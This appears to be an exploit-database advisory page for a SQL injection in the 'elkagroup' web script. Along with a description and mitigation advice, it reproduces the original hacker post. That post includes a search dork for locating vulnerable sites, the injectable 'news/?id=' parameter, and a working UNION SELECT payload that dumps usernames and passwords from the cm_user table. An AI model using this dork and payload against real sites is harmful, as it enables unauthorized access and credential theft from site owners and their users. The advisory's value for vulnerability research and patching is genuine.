elkagroup SQL Injection Vulnerability (Iranian Script)

vendor:

elkagroup

by:

SadHaCkEr

CVSS

HIGH

SQL Injection

CWE

Product Name: elkagroup

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

elkagroup SQL Injection Vulnerability (Iranian Script)

A SQL injection vulnerability exists in elkagroup, which allows an attacker to execute arbitrary SQL commands on the underlying database. The vulnerability is due to insufficient input validation of the 'id' parameter in the 'news' page. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable server. Successful exploitation of this vulnerability can allow an attacker to gain unauthorized access to sensitive information stored in the database.

Mitigation:

Input validation should be performed to ensure that user-supplied data is properly sanitized before being used in SQL queries. Additionally, the application should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#Dork : "powered by: elkagroup"

[*]############################################## 
[+] |____SadHaCkEr__|__\              #
[+] |______________________|___||\*___          #
[+] |______________________|___||""|"*\___,     #
[+] |______________________|___||""|*"|___||    #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)*     #
[+]========================================================================================================================================||
[*] About    : elkagroup  SQL Injection Vulnerability (Iranian Script) 																	    ||
[!] Site     : http://www.elkagroup.com                               																		||
[!] Author   : SadHaCkEr                                            																	    ||
[!] Site     : www.alkrsan.net + www.tryag.cc                     																			||                                            
[!] E-Mail   : sad@hack3d.org                     																	        ||
[!] Location : Saudi Arabia                                         																	    ||
[!]=========================================================================================================================================||
[!]                                                   MyWebSite    http://www.sadx.297m.com                           																	||
[!]=========================================================================================================================================||
[!] Exp:
[!]  http://server/news/?id=[SQL]                       																		||
[!]
[!]    [SQL] :                                                        																	    ||
[!]	    UNION SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(username,char(58),password),12,13,14,15,16,17,18,19,20,21,22,23 FROM+cm_user--
[!]                      											  																	    ||
[!]   
[!]                                          					    															       	    ||   
[!]					Greetz 2 : alkrsan - þAlaooy HaCkEr - S.C.T - RXH - ayaster - Mr.Wolf  and All My Friends 
[!]                           										   																	    ||
[!]														    Sad Team
[!]                                    					               																		||
[!]
[!]                                                              
[!]=========================================================================================================================================||